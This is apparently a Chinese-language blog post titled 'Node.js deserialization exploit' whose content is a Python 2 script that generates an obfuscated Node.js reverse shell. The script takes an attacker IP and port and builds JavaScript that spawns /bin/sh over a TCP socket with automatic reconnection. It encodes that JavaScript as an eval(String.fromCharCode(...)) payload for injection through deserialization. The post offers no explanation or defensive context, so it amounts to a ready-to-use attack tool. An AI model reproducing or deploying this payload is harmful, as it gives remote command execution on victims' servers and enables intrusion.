Node.js反序列化利用Exp

  • A+
所属分类:颓废's Blog
#!/usr/bin/python # Generator for encoded NodeJS reverse shells # Based on the NodeJS reverse shell by Evilpacket # https://github.com/evilpacket/node-shells/blob/master/node_revshell.js # Onelineified and suchlike by infodox (and felicity, who sat on the keyboard) # Insecurety Research (2013) - insecurety.net import sys  if len(sys.argv) != 3:     print "Usage: %s  " % (sys.argv[0])     sys.exit(0)  IP_ADDR = sys.argv[1] PORT = sys.argv[2]   def charencode(string):     """String.CharCode"""     encoded = ''     for char in string:         encoded = encoded + "," + str(ord(char))     return encoded[1:]  print "[+] LHOST = %s" % (IP_ADDR) print "[+] LPORT = %s" % (PORT) NODEJS_REV_SHELL = ''' var net = require('net'); var spawn = require('child_process').spawn; HOST="%s"; PORT="%s"; TIMEOUT="5000"; if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; } function c(HOST,PORT) {     var client = new net.Socket();     client.connect(PORT, HOST, function() {         var sh = spawn('/bin/sh',[]);         client.write("Connected!/n");         client.pipe(sh.stdin);         sh.stdout.pipe(client);         sh.stderr.pipe(client);         sh.on('exit',function(code,signal){           client.end("Disconnected!/n");         });     });     client.on('error', function(e) {         setTimeout(c(HOST,PORT), TIMEOUT);     }); } c(HOST,PORT); ''' % (IP_ADDR, PORT) print "[+] Encoding" PAYLOAD = charencode(NODEJS_REV_SHELL) print "eval(String.fromCharCode(%s))" % (PAYLOAD)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: